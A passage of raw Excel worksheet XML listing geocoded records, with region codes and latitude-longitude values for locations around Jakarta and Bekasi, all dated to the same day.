        <v>3173050001</v>
      </c>
      <c r="N1177">
        <v>3173050</v>
      </c>
      <c r="O1177">
        <v>3173</v>
      </c>
      <c r="P1177">
        <v>31</v>
      </c>
      <c r="Q1177" t="s">
        <v>2790</v>
      </c>
      <c r="R1177" t="s">
        <v>589</v>
      </c>
      <c r="S1177" t="s">
        <v>62</v>
      </c>
      <c r="T1177" t="s">
        <v>33</v>
      </c>
      <c r="U1177" s="5">
        <v>10685966</v>
      </c>
      <c r="V1177" s="5" t="s">
        <v>15546</v>
      </c>
      <c r="W1177" s="5">
        <v>-619173</v>
      </c>
      <c r="X1177" t="s">
        <v>18987</v>
      </c>
      <c r="Y1177" t="str">
        <f t="shared" si="18"/>
        <v>-6.19173,106.85966</v>
      </c>
    </row>
    <row r="1178" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1178">
        <v>108749</v>
      </c>
      <c r="B1178" s="1">
        <v>43885</v>
      </c>
      <c r="C1178">
        <v>1</v>
      </c>
      <c r="D1178" t="s">
        <v>22</v>
      </c>
      <c r="E1178" t="s">
        <v>23</v>
      </c>
      <c r="F1178" t="s">
        <v>4344</v>
      </c>
      <c r="H1178" t="s">
        <v>26</v>
      </c>
      <c r="I1178" t="s">
        <v>1633</v>
      </c>
      <c r="J1178" t="s">
        <v>2627</v>
      </c>
      <c r="L1178" t="s">
        <v>4345</v>
      </c>
      <c r="M1178">
        <v>3275060005</v>
      </c>
      <c r="N1178">
        <v>3275060</v>
      </c>
      <c r="O1178">
        <v>3275</v>
      </c>
      <c r="P1178">
        <v>32</v>
      </c>
      <c r="Q1178" t="s">
        <v>3526</v>
      </c>
      <c r="R1178" t="s">
        <v>114</v>
      </c>
      <c r="S1178" t="s">
        <v>41</v>
      </c>
      <c r="T1178" t="s">
        <v>42</v>
      </c>
      <c r="U1178" s="5">
        <v>10696434</v>
      </c>
      <c r="V1178" s="5" t="s">
        <v>15319</v>
      </c>
      <c r="W1178" s="5">
        <v>-621051</v>
      </c>
      <c r="X1178" t="s">
        <v>19327</v>
      </c>
      <c r="Y1178" t="str">
        <f t="shared" si="18"/>
        <v>-6.21051,106.96434</v>
      </c>
    </row>
    <row r="1179" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1179">
        <v>108750</v>
      </c>
      <c r="B1179" s="1">
        <v>43885</v>
      </c>
      <c r="C1179">
        <v>1</v>
      </c>
      <c r="D1179" t="s">
        <v>22</v>
      </c>
      <c r="E1179" t="s">
        <v>23</v>
      </c>
      <c r="F1179" t="s">
        <v>4346</v>
      </c>
      <c r="G1179" t="s">
        <v>4347</v>
      </c>
      <c r="H1179" t="s">
        <v>26</v>
      </c>
      <c r="I1179" t="s">
        <v>882</v>
      </c>
      <c r="J1179" t="s">
        <v>2627</v>
      </c>
      <c r="L1179" t="s">
        <v>4348</v>
      </c>
      <c r="M1179">
        <v>3275010011</v>
      </c>
      <c r="N1179">
        <v>3275010</v>
      </c>
      <c r="O1179">
        <v>3275</v>
      </c>
      <c r="P1179">
        <v>32</v>
      </c>
      <c r="Q1179" t="s">
        <v>2389</v>
      </c>
      <c r="R1179" t="s">
        <v>287</v>
      </c>
      <c r="S1179" t="s">
        <v>41</v>
      </c>
      <c r="T1179" t="s">
        <v>42</v>
      </c>
      <c r="U1179" s="5">
        <v>10692208</v>
      </c>
      <c r="V1179" s="5" t="s">
        <v>15547</v>
      </c>
      <c r="W1179" s="5">
        <v>-625987</v>
      </c>
      <c r="X1179" t="s">
        <v>19328</v>
      </c>
      <c r="Y1179" t="str">
        <f t="shared" si="18"/>
        <v>-6.25987,106.92208</v>
      </c>
    </row>
    <row r="1180" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1180">
        <v>108751</v>
      </c>
      <c r="B1180" s="1">
        <v>43885</v>
      </c>
      <c r="C1180">
        <v>1</v>
      </c>
      <c r="D1180" t="s">
        <v>22</v>
      </c>
      <c r="E1180" t="s">
        <v>23</v>
      </c>
      <c r="F1180" t="s">
        <v>4349</v>
      </c>
      <c r="H1180" t="s">
        <v>26</v>
      </c>
      <c r="I1180" t="s">
        <v>4350</v>
      </c>
      <c r="J1180" t="s">
        <v>586</v>
      </c>
      <c r="L1180" t="s">
        <v>4351</v>
      </c>
      <c r="M1180">
        <v>3173050002</v>
      </c>
      <c r="N1180">
        <v>3173050</v>
      </c>
      <c r="O1180">
        <v>3173</v>
      </c>
      <c r="P1180">
        <v>31</v>
      </c>
      <c r="Q1180" t="s">
        <v>588</v>
      </c>
      <c r="R1180" t="s">
        <v>589</v>
      </c>
      <c r="S1180" t="s">
        <v>62</v>
      </c>
      <c r="T1180" t="s">
        <v>33</v>
      </c>
      <c r="U1180" s="5">
        <v>10687065</v>
      </c>
      <c r="V1180" s="5" t="s">
        <v>15548</v>
      </c>
      <c r="W1180" s="5">
        <v>-617539</v>
      </c>
      <c r="X1180" t="s">
        <v>19329</v>
      </c>
      <c r="Y1180" t="str">
        <f t="shared" si="18"/>
        <v>-6.17539,106.87065</v>
      </c>
    </row>
    <row r="1181" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1181">
        <v>108752</v>
      </c>
      <c r="B1181" s="1">
        <v>43885</v>
      </c>
      <c r="C1181">
        <v>1</v>
      </c>
      <c r="D1181" t="s">
        <v>22</v>
      </c>
      <c r="E1181" t="s">
        <v>23</v>
      </c>
      <c r="F1181" t="s">
        <v>4352</v>
      </c>
      <c r="H1181" t="s">
        <v>26</v>
      </c>
      <c r="I1181" t="s">
        <v>1633</v>
      </c>
      <c r="J1181" t="s">
        <v>2494</v>
      </c>
      <c r="L1181" t="s">
        <v>4353</v>
      </c>
      <c r="M1181">
        <v>3175050001</v>
      </c>
      <c r="N1181">
        <v>3175050</v>
      </c>
      <c r="O1181">
        <v>3175</v>
      </c>
      <c r="P1181">
        <v>31</v>
      </c>
      <c r="Q1181" t="s">
        <v>1037</v>
      </c>
      <c r="R1181" t="s">
        <v>1013</v>
      </c>
      <c r="S1181" t="s">
        <v>547</v>
      </c>
      <c r="T1181" t="s">
        <v>33</v>
      </c>
      <c r="U1181" s="5">
        <v>10690652</v>
      </c>
      <c r="V1181" s="5" t="s">
        <v>15549</v>
      </c>
      <c r="W1181" s="5">
        <v>-614859</v>
      </c>
      <c r="X1181" t="s">
        <v>19330</v>
      </c>
      <c r="Y1181" t="str">
        <f t="shared" si="18"/>
        <v>-6.14859,106.90652</v>
      </c>
    </row>
    <row r="1182" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1182">
        <v>108753</v>
      </c>
      <c r="B1182" s="1">
        <v>43885</v>
      </c>
      <c r="C1182">
        <v>1</v>
      </c>
      <c r="D1182" t="s">
        <v>22</v>
      </c>
      <c r="E1182" t="s">
        <v>23</v>
      </c>
      <c r="F1182" t="s">
        <v>4354</v>
      </c>
      <c r="H1182" t="s">
        <v>26</v>
      </c>
      <c r="I1182" t="s">
        <v>3951</v>
      </c>
      <c r="J1182" t="s">
        <v>4355</v>
      </c>
      <c r="L1182" t="s">
        <v>4356</v>
      </c>
      <c r="M1182">
        <v>3172080002</v>
      </c>
      <c r="N1182">
        <v>3172080</v>
      </c>
      <c r="O1182">
        <v>3172</v>
      </c>
      <c r="P1182">
        <v>31</v>
      </c>
      <c r="Q1182" t="s">
        <v>2804</v>
      </c>
      <c r="R1182" t="s">
        <v>141</v>
      </c>
      <c r="S1182" t="s">
        <v>49</v>
      </c>
      <c r="T1182" t="s">
        <v>33</v>
      </c>
      <c r="U1182" s="5">
        <v>10693789</v>
      </c>
      <c r="V1182" s="5" t="s">
        <v>15550</v>
      </c>
      <c r="W1182" s="5">
        <v>-620225</v>
      </c>
      <c r="X1182" t="s">
        <v>19331</v>
      </c>
      <c r="Y1182" t="str">
        <f t="shared" si="18"/>
        <v>-6.20225,106.93789</v>
      </c>
    </row>
    <row r="1183" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1183">
        <v>108754</v>
      </c>
      <c r="B1183" s="1">
        <v>43885</v>
      </c>
      <c r="C1183">
        <v>1</v>
      </c>
      <c r="D1183" t="s">
        <v>22</v>
      </c>
      <c r="E1183" t="s">
        <v>23</v>
      </c>
      <c r="F1183" t="s">
        <v>4357</v>
      </c>
      <c r="G1183" t="s">
        <v>4358</v>
      </c>
      <c r="H1183" t="s">
        <v>26</v>
      </c>
      <c r="I1183" t="s">
        <v>1621</v>
      </c>
      <c r="J1183" t="s">
        <v>2919</v>
      </c>
      <c r="L1183" t="s">
        <v>4359</v>
      </c>
      <c r="M1183">
        <v>3172090004</v>
      </c>
      <c r="N1183">
        <v>3172090</v>
      </c>
      <c r="O1183">
        <v>3172</v>
      </c>
      <c r="P1183">
        <v>31</v>
      </c>
      <c r="Q1183" t="s">
        <v>889</v>
      </c>
      <c r="R1183" t="s">
        <v>890</v>
      </c>
      <c r="S1183" t="s">
        <v>49</v>
      </c>
      <c r="T1183" t="s">
        <v>33</v>
      </c>
      <c r="U1183" s="5">
        <v>10689601</v>
      </c>
      <c r="V1183" s="5" t="s">
        <v>15551</v>
      </c>
      <c r="W1183" s="5">
        <v>-619876</v>
      </c>
      <c r="X1183" t="s">
        <v>19012</v>
      </c>
      <c r="Y1183" t="str">
        <f t="shared" si="18"/>
        <v>-6.19876,106.89601</v>
      </c>
    </row>
    <row r="1184" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1184">
        <v>108755</v>
      </c>
      <c r="B1184" s="1">
        <v>43885</v>
      </c>
      <c r="C1184">
        <v>1</v>
      </c>
      <c r="D1184" t="s">
        <v>22</v>
      </c>
      <c r="E1184" t="s">
        <v>23</v>
      </c>
      <c r="F1184" t="s">
        <v>4360</v>
      </c>
      <c r="H1184" t="s">
        <v>26</v>
      </c>
      <c r="I1184" t="s">
        <v>4361</v>
      </c>
      <c r="J1184" t="s">
        <v>1666</v>
      </c>
      <c r="L1184" t="s">
        <v>4362</v>
      </c>
      <c r="M1184">
        <v>3171090007</v>
      </c>
      <c r="N1184">
        <v>3171090</v>
      </c>
      <c r="O1184">
        <v>3171</v>
      </c>
      <c r="P1184">
        <v>31</v>
      </c>
      <c r="Q1184" t="s">
        <v>346</v>
      </c>
      <c r="R1184" t="s">
        <v>347</v>
      </c>
      <c r="S1184" t="s">
        <v>108</v>
      </c>
      <c r="T1184" t="s">
        <v>33</v>
      </c>
      <c r="U1184" s="5">
        <v>10685463</v>
      </c>
      <c r="V1184" s="5" t="s">
        <v>15552</v>
      </c>
      <c r="W1184" s="5">
        <v>-621149</v>
      </c>
      <c r="X1184" t="s">
        <v>19332</v>
      </c>
      <c r="Y1184" t="str">
        <f t="shared" si="18"/>
        <v>-6.21149,106.85463</v>
      </c>
    </row>
    <row r="1185" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1185">
        <v>108756</v>
      </c>
      <c r="B1185" s="1">
        <v>43885</v>
      </c>
      <c r="C1185">
        <v>1</v>
      </c>
      <c r="D1185" t="s">
        <v>22</v>
      </c>
      <c r="E1185" t="s">
        <v>23</v>
      </c>
      <c r="F1185" t="s">
        <v>4363</v>
      </c>
      <c r="H1185" t="s">
        <v>26</v>
      </c>
      <c r="I1185" t="s">
        <v>819</v>
      </c>
      <c r="J1185" t="s">
        <v>2845</v>
      </c>
      <c r="L1185" t="s">
        <v>4364</v>
      </c>
      <c r="M1185">
        <v>3172070003</v>
      </c>
      <c r="N1185">
        <v>3172070</v>
      </c>
      <c r="O1185">
        <v>3172</v>
      </c>
      <c r="P1185">
        <v>31</v>
      </c>
      <c r="Q1185" t="s">
        <v>2659</v>
      </c>
      <c r="R1185" t="s">
        <v>128</v>
      </c>
      <c r="S1185" t="s">
        <v>49</v>
      </c>
      <c r="T1185" t="s">
        <v>33</v>
      </c>
      <c r="U1185" s="5">
        <v>10693180</v>
      </c>
      <c r="V1185" s="5" t="s">
        <v>15553</v>
      </c>
      <c r="W1185" s="5">
        <v>-623348</v>
      </c>
      <c r="X1185" t="s">
        <v>19333</v>
      </c>
      <c r="Y1185" t="str">
        <f t="shared" si="18"/>
        <v>-6.23348,106.93180</v>
      </c>
    </row>
    <row r="1186" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1186">
        <v>108757</v>
      </c>
      <c r="B1186" s="1">
        <v>43885</v>
      </c>
      <c r="C1186">
        <v>1</v>
      </c>
      <c r="D1186" t="s">
        <v>22</v>
      </c>
      <c r="E1186" t="s">
        <v>23</v>
      </c>
      <c r="F1186" t="s">
        <v>4365</v>
      </c>
      <c r="G1186" t="s">
        <v>4366</v>
      </c>
      <c r="H1186" t="s">
        <v>26</v>
      </c>
      <c r="I1186" t="s">
        <v>753</v>
      </c>
      <c r="J1186" t="s">
        <v>4367</v>
      </c>
      <c r="L1186" t="s">
        <v>4368</v>
      </c>
      <c r="M1186">
        <v>3172030002</v>
      </c>
      <c r="N1186">
        <v>3172030</v>
      </c>
      <c r="O1186">
        <v>3172</v>
      </c>
      <c r="P1186">
        <v>31</v>
      </c>
      <c r="Q1186" t="s">
        <v>1534</v>
      </c>
      <c r="R1186" t="s">
        <v>228</v>
      </c>
      <c r="S1186" t="s">
        <v>49</v>
      </c>
      <c r="T1186" t="s">
        <v>33</v>
      </c>
      <c r="U1186" s="5">
        <v>10690002</v>
      </c>
      <c r="V1186" s="5" t="s">
        <v>15554</v>
      </c>
      <c r="W1186" s="5">
        <v>-633256</v>
      </c>
      <c r="X1186" t="s">
        <v>19334</v>
      </c>
      <c r="Y1186" t="str">
        <f t="shared" si="18"/>
        <v>-6.33256,106.90002</v>
      </c>
    </row>
    <row r="1187" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1187">
        <v>108758</v>
      </c>
      <c r="B1187" s="1">
        <v>43885</v>
      </c>
      <c r="C1187">
        <v>1</v>
      </c>
      <c r="D1187" t="s">
        <v>22</v>
      </c>
      <c r="E1187" t="s">
        <v>23</v>
      </c>
      <c r="F1187" t="s">
        <v>4369</v>
      </c>
      <c r="G1187" t="s">
        <v>4370</v>
      </c>
      <c r="H1187" t="s">
        <v>26</v>
      </c>
      <c r="I1187" t="s">
        <v>1621</v>
      </c>
      <c r="J1187" t="s">
        <v>2916</v>
      </c>
      <c r="L1187" t="s">
        <v>4371</v>
      </c>
      <c r="M1187">
        <v>3172040003</v>
      </c>
      <c r="N1187">
        <v>3172040</v>
      </c>
      <c r="O1187">
        <v>3172</v>
      </c>
      <c r="P1187">
        <v>31</v>
      </c>
      <c r="Q1187" t="s">
        <v>552</v>
      </c>
      <c r="R1187" t="s">
        <v>281</v>
      </c>
      <c r="S1187" t="s">
        <v>49</v>
      </c>
      <c r="T1187" t="s">
        <v>33</v>
      </c>
      <c r="U1187" s="5">
        <v>10688146</v>
      </c>
      <c r="V1187" s="5" t="s">
        <v>15555</v>
      </c>
      <c r="W1187" s="5">
        <v>-626340</v>
      </c>
      <c r="X1187" t="s">
        <v>19335</v>
      </c>
      <c r="Y1187" t="str">
        <f t="shared" si="18"/>
        <v>-6.26340,106.88146</v>
      </c>
    </row>
    <row r="1188" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1188">
        <v>108759</v>
      </c>
      <c r="B1188" s="1">
        <v>43885</v>
      </c>
      <c r="C1188">
        <v>1</v>
      </c>
      <c r="D1188" t="s">
        <v>22</v>
      </c>
      <c r="E1188" t="s">
        <v>23</v>
      </c>
      <c r="F1188" t="s">
        <v>4372</v>
      </c>
      <c r="H1188" t="s">
        <v>26</v>
      </c>
      <c r="I1188" t="s">
        <v>1253</v>
      </c>
      <c r="J1188" t="s">
        <v>2657</v>
      </c>
      <c r="L1188" t="s">
        <v>250</v>
      </c>
      <c r="M1188">
        <v>3172070003</v>
      </c>
      <c r="N1188">
        <v>3172070</v>
      </c>
      <c r="O1188">
        <v>3172</v>
      </c>
      <c r="P1188">
        <v>31</v>
      </c>
      <c r="Q1188" t="s">
        <v>2659</v>
      </c>
      <c r="R1188" t="s">
        <v>128</v>
      </c>
      <c r="S1188" t="s">
        <v>49</v>
      </c>
      <c r="T1188" t="s">
        <v>33</v>
      </c>
      <c r="U1188" s="5">
        <v>10693105</v>
      </c>
      <c r="V1188" s="5" t="s">
        <v>15032</v>
      </c>
      <c r="W1188" s="5">
        <v>-623854</v>
      </c>
      <c r="X1188" t="s">
        <v>19336</v>
      </c>
      <c r="Y1188" t="str">
        <f t="shared" si="18"/>
        <v>-6.23854,106.93105</v>
      </c>
    </row>
    <row r="1189" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1189">
        <v>108760</v>
      </c>
      <c r="B1189" s="1">
        <v>43885</v>
      </c>
      <c r="C1189">
        <v>1</v>
      </c>
      <c r="D1189" t="s">
        <v>22</v>
      </c>
      <c r="E1189" t="s">
        <v>23</v>
      </c>
      <c r="F1189" t="s">
        <v>4373</v>
      </c>
      <c r="G1189" t="s">
        <v>4374</v>
      </c>
      <c r="H1189" t="s">
        <v>26</v>
      </c>
      <c r="I1189" t="s">
        <v>166</v>
      </c>
      <c r="J1189" t="s">
        <v>2627</v>
      </c>
      <c r="L1189" t="s">
        <v>4375</v>
      </c>
      <c r="M1189">
        <v>3275050001</v>
      </c>
      <c r="N1189">
        <v>3275050</v>
      </c>
      <c r="O1189">
        <v>3275</v>
      </c>
      <c r="P1189">
        <v>32</v>
      </c>
      <c r="Q1189" t="s">
        <v>4376</v>
      </c>
      <c r="R1189" t="s">
        <v>955</v>
      </c>
      <c r="S1189" t="s">
        <v>41</v>
      </c>
      <c r="T1189" t="s">
        <v>42</v>
      </c>
      <c r="U1189" s="5">
        <v>10696646</v>
      </c>
      <c r="V1189" s="5" t="s">
        <v>15556</v>
      </c>
      <c r="W1189" s="5">
        <v>-628001</v>
      </c>
      <c r="X1189" t="s">
        <v>19337</v>
      </c>
      <c r="Y1189" t="str">
        <f t="shared" si="18"/>
        <v>-6.28001,106.96646</v>
      </c>
    </row>
    <row r="1190" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1190">
        <v>108761</v>
      </c>
      <c r="B1190" s="1">
        <v>43885</v>
      </c>
      <c r="C1190">
        <v>1</v>
      </c>
      <c r="D1190" t="s">
        <v>22</v>
      </c>
      <c r="E1190" t="s">
        <v>23</v>
      </c>
      <c r="F1190" t="s">
        <v>4377</v>
      </c>
      <c r="G1190" t="s">
        <v>4378</v>
      </c>
      <c r="H1190" t="s">
        <v>26</v>
      </c>
      <c r="I1190" t="s">
        <v>2598</v>
      </c>
      <c r="J1190" t="s">
        <v>4379</v>
      </c>
      <c r="M1190">
        <v>3173060008</v>
      </c>
      <c r="N1190">
        <v>3173060</v>
      </c>
      <c r="O1190">
        <v>3173</v>
      </c>
      <c r="P1190">
        <v>31</v>
      </c>
      <c r="Q1190" t="s">
        <v>329</v>
      </c>
      <c r="R1190" t="s">
        <v>61</v>
      </c>
      <c r="S1190" t="s">
        <v>62</v>
      </c>
      <c r="T1190" t="s">
        <v>33</v>
      </c>
      <c r="U1190" s="5">
        <v>10684329</v>
      </c>
      <c r="V1190" s="5" t="s">
        <v>15557</v>
      </c>
      <c r="W1190" s="5">
        <v>-616226</v>
      </c>
      <c r="X1190" t="s">
        <v>19338</v>
      </c>
      <c r="Y1190" t="str">
        <f t="shared" si="18"/>
        <v>-6.16226,106.84329</v>
      </c>
    </row>
    <row r="1191" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1191">
        <v>108762</v>
      </c>
      <c r="B1191" s="1">
        <v>43885</v>
      </c>
      <c r="C1191">
        <v>1</v>
      </c>
      <c r="D1191" t="s">
        <v>22</v>
      </c>
      <c r="E1191" t="s">
        <v>23</v>
      </c>
      <c r="F1191" t="s">
        <v>4380</v>
      </c>
      <c r="H1191" t="s">
        <v>26</v>
      </c>
      <c r="I1191" t="s">
        <v>4381</v>
      </c>
      <c r="J1191" t="s">
        <v>2627</v>
      </c>
      <c r="L1191" t="s">
        <v>4382</v>
      </c>
      <c r="M1191">
        <v>3275060001</v>
      </c>
      <c r="N1191">
        <v>3275060</v>
      </c>
      <c r="O1191">
        <v>3275</v>
      </c>
      <c r="P1191">
        <v>32</v>
      </c>
      <c r="Q1191" t="s">
        <v>611</v>
      </c>
      <c r="R1191" t="s">
        <v>114</v>
      </c>
      <c r="S1191" t="s">
        <v>41</v>
      </c>
      <c r="T1191" t="s">
        <v>42</v>
      </c>
      <c r="U1191" s="5">
        <v>10695439</v>
      </c>
      <c r="V1191" s="5" t="s">
        <v>15558</v>
      </c>
      <c r="W1191" s="5">
        <v>-623070</v>
      </c>
      <c r="X1191" t="s">
        <v>19339</v>
      </c>
      <c r="Y1191" t="str">
        <f t="shared" si="18"/>
        <v>-6.23070,106.95439</v>
      </c>
    </row>
    <row r="1192" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1192">
        <v>108763</v>
      </c>
      <c r="B1192" s="1">
        <v>43885</v>
      </c>
      <c r="C1192">
        <v>1</v>
      </c>
      <c r="D1192" t="s">
        <v>22</v>
      </c>
      <c r="E1192" t="s">
        <v>23</v>
      </c>
      <c r="F1192" t="s">
        <v>4383</v>
      </c>
      <c r="G1192" t="s">
        <v>4384</v>
      </c>
      <c r="H1192" t="s">
        <v>26</v>
      </c>
      <c r="I1192" t="s">
        <v>4385</v>
      </c>
      <c r="J1192" t="s">
        <v>3742</v>
      </c>
      <c r="L1192" t="s">
        <v>4386</v>
      </c>
      <c r="M1192">
        <v>3172020005</v>
      </c>
      <c r="N1192">
        <v>3172020</v>
      </c>
      <c r="O1192">
        <v>3172</v>
      </c>
      <c r="P1192">
        <v>31</v>
      </c>
      <c r="Q1192" t="s">
        <v>3744</v>
      </c>
      <c r="R1192" t="s">
        <v>1644</v>
      </c>
      <c r="S1192" t="s">
        <v>49</v>
      </c>
      <c r="T1192" t="s">
        <v>33</v>
      </c>
      <c r="U1192" s="5">
        <v>10687338</v>
      </c>
      <c r="V1192" s="5" t="s">
        <v>15079</v>
      </c>
      <c r="W1192" s="5">
        <v>-629376</v>
      </c>
      <c r="X1192" t="s">
        <v>19340</v>
      </c>
      <c r="Y1192" t="str">
        <f t="shared" si="18"/>
        <v>-6.29376,106.87338</v>
      </c>
    </row>
    <row r="1193" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1193">
        <v>108764</v>
      </c>
      <c r="B1193" s="1">
        <v>43885</v>
      </c>
      <c r="C1193">
        <v>1</v>
      </c>
      <c r="D1193" t="s">
        <v>22</v>
      </c>
      <c r="E1193" t="s">
        <v>23</v>
      </c>
      <c r="F1193" t="s">
        <v>4387</v>
      </c>
      <c r="G1193" t="s">
        <v>4388</v>
      </c>
      <c r="H1193" t="s">
        <v>26</v>
      </c>
      <c r="I1193" t="s">
        <v>1490</v>
      </c>
      <c r="J1193" t="s">
        <v>3469</v>
      </c>
      <c r="L1193" t="s">
        <v>4389</v>
      </c>
      <c r="M1193">
        <v>3173020005</v>
      </c>
      <c r="N1193">
        <v>3173020</v>
      </c>
      <c r="O1193">
        <v>3173</v>
      </c>
      <c r="P1193">
        <v>31</v>
      </c>
      <c r="Q1193" t="s">
        <v>2041</v>
      </c>
      <c r="R1193" t="s">
        <v>179</v>
      </c>
      <c r="S1193" t="s">
        <v>62</v>
      </c>
      <c r="T1193" t="s">
        <v>33</v>
      </c>
      <c r="U1193" s="5">
        <v>10682859</v>
      </c>
      <c r="V1193" s="5" t="s">
        <v>15559</v>
      </c>
      <c r="W1193" s="5">
        <v>-618560</v>
      </c>
      <c r="X1193" t="s">
        <v>19341</v>
      </c>
      <c r="Y1193" t="str">
        <f t="shared" si="18"/>
        <v>-6.18560,106.82859</v>
      </c>
    </row>
    <row r="1194" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1194">
        <v>108765</v>
      </c>
      <c r="B1194" s="1">
        <v>43885</v>
      </c>
      <c r="C1194">
        <v>1</v>
      </c>
      <c r="D1194" t="s">
        <v>22</v>
      </c>
      <c r="E1194" t="s">
        <v>23</v>
      </c>
      <c r="F1194" t="s">
        <v>4390</v>
      </c>
      <c r="H1194" t="s">
        <v>26</v>
      </c>
      <c r="I1194" t="s">
        <v>788</v>
      </c>
      <c r="J1194" t="s">
        <v>2627</v>
      </c>
      <c r="L1194" t="s">
        <v>4391</v>
      </c>
      <c r="M1194">
        <v>3275010011</v>
      </c>
      <c r="N1194">
        <v>3275010</v>
      </c>
      <c r="O1194">
        <v>3275</v>
      </c>
      <c r="P1194">
        <v>32</v>
      </c>
      <c r="Q1194" t="s">
        <v>2389</v>
      </c>
      <c r="R1194" t="s">
        <v>287</v>
      </c>
      <c r="S1194" t="s">
        <v>41</v>
      </c>
      <c r="T1194" t="s">
        <v>42</v>
      </c>
      <c r="U1194" s="5">
        <v>10691325</v>
      </c>
      <c r="V1194" s="5" t="s">
        <v>15560</v>
      </c>
      <c r="W1194" s="5">
        <v>-626198</v>
      </c>
      <c r="X1194" t="s">
        <v>19342</v>
      </c>
      <c r="Y1194" t="str">
        <f t="shared" si="18"/>
        <v>-6.26198,106.91325</v>
      </c>
    </row>
    <row r="1195" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1195">
        <v>108766</v>
      </c>
      <c r="B1195" s="1">
        <v>43885</v>
      </c>
      <c r="C1195">
        <v>1</v>
      </c>
      <c r="D1195" t="s">
        <v>22</v>
      </c>
      <c r="E1195" t="s">
        <v>23</v>
      </c>
      <c r="F1195" t="s">
        <v>4392</v>
      </c>
      <c r="G1195" t="s">
        <v>4393</v>
      </c>
      <c r="H1195" t="s">
        <v>26</v>
      </c>
      <c r="I1195" t="s">
        <v>624</v>
      </c>
      <c r="J1195" t="s">
        <v>45</v>
      </c>
      <c r="L1195" t="s">
        <v>4394</v>
      </c>
      <c r="M1195">
        <v>3172060004</v>
      </c>
      <c r="N1195">
        <v>3172060</v>
      </c>
      <c r="O1195">
        <v>3172</v>
      </c>
      <c r="P1195">
        <v>31</v>
      </c>
      <c r="Q1195" t="s">
        <v>47</v>
      </c>
      <c r="R1195" t="s">
        <v>48</v>
      </c>
      <c r="S1195" t="s">
        <v>49</v>
      </c>
      <c r="T1195" t="s">
        <v>33</v>
      </c>
      <c r="U1195" s="5">
        <v>10689104</v>
      </c>
      <c r="V1195" s="5" t="s">
        <v>15561</v>
      </c>
      <c r="W1195" s="5">
        <v>-623389</v>
      </c>
      <c r="X1195" t="s">
        <v>19343</v>
      </c>
      <c r="Y1195" t="str">
        <f t="shared" si="18"/>
        <v>-6.23389,106.89104</v>
      </c>
    </row>
    <row r="1196" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1196">
        <v>108767</v>
      </c>
      <c r="B1196" s="1">
        <v>43885</v>
      </c>
      <c r="C1196">
        <v>1</v>
      </c>
      <c r="D1196" t="s">
        <v>22</v>
      </c>
      <c r="E1196" t="s">
        <v>23</v>
      </c>
      <c r="F1196" t="s">
        <v>4395</v>
      </c>
      <c r="G1196" t="s">
        <v>4396</v>
      </c>
      <c r="H1196" t="s">
        <v>26</v>
      </c>
      <c r="I1196" t="s">
        <v>4350</v>
      </c>
      <c r="J1196" t="s">
        <v>1590</v>
      </c>
      <c r="M1196">
        <v>3175030002</v>
      </c>
      <c r="N1196">
        <v>3175030</v>
      </c>
      <c r="O1196">
        <v>3175</v>
      </c>
      <c r="P1196">
        <v>31</v>
      </c>
      <c r="Q1196" t="s">
        <v>1592</v>
      </c>
      <c r="R1196" t="s">
        <v>1563</v>
      </c>
      <c r="S1196" t="s">
        <v>547</v>
      </c>
      <c r="T1196" t="s">
        <v>33</v>
      </c>
      <c r="U1196" s="5">
        <v>10688423</v>
      </c>
      <c r="V1196" s="5" t="s">
        <v>15562</v>
      </c>
      <c r="W1196" s="5">
        <v>-615767</v>
      </c>
      <c r="X1196" t="s">
        <v>19344</v>
      </c>
      <c r="Y1196" t="str">
        <f t="shared" si="18"/>
        <v>-6.15767,106.88423</v>
      </c>
    </row>
    <row r="1197" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1197">
        <v>108768</v>
      </c>
      <c r="B1197" s="1">
        <v>43885</v>
      </c>
      <c r="C1197">
        <v>1</v>
      </c>
      <c r="D1197" t="s">
        <v>22</v>
      </c>
      <c r="E1197" t="s">
        <v>23</v>
      </c>
      <c r="F1197" t="s">
        <v>4397</v>
      </c>
      <c r="G1197" t="s">
        <v>4398</v>
      </c>
      <c r="H1197" t="s">
        <v>26</v>
      </c>
      <c r="I1197" t="s">
        <v>1201</v>
      </c>
      <c r="J1197" t="s">
        <v>925</v>
      </c>
      <c r="L1197" t="s">
        <v>4399</v>
      </c>
      <c r="M1197">
        <v>3174070004</v>
      </c>
      <c r="N1197">
        <v>3174070</v>
      </c>
      <c r="O1197">
        <v>3174</v>
      </c>
      <c r="P1197">
        <v>31</v>
      </c>
      <c r="Q1197" t="s">
        <v>926</v>
      </c>
      <c r="R1197" t="s">
        <v>84</v>
      </c>
      <c r="S1197" t="s">
        <v>32</v>
      </c>
      <c r="T1197" t="s">
        <v>33</v>
      </c>
      <c r="U1197" s="5">
        <v>10674087</v>
      </c>
      <c r="V1197" s="5" t="s">
        <v>15563</v>
      </c>
      <c r="W1197" s="5">
        <v>-613473</v>
      </c>
      <c r="X1197" t="s">
        <v>19345</v>
      </c>
      <c r="Y1197" t="str">
        <f t="shared" si="18"/>
        <v>-6.13473,106.74087</v>
      </c>
    </row>
    <row r="1198" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1198">
        <v>108769</v>
      </c>
      <c r="B1198" s="1">
        <v>43885</v>
      </c>
      <c r="C1198">
        <v>1</v>
      </c>
      <c r="D1198" t="s">
        <v>22</v>
      </c>
      <c r="E1198" t="s">
        <v>23</v>
      </c>
      <c r="F1198" t="s">
        <v>4400</v>
      </c>
      <c r="G1198" t="s">
        <v>4401</v>
      </c>
      <c r="H1198" t="s">
        <v>26</v>
      </c>
      <c r="I1198" t="s">
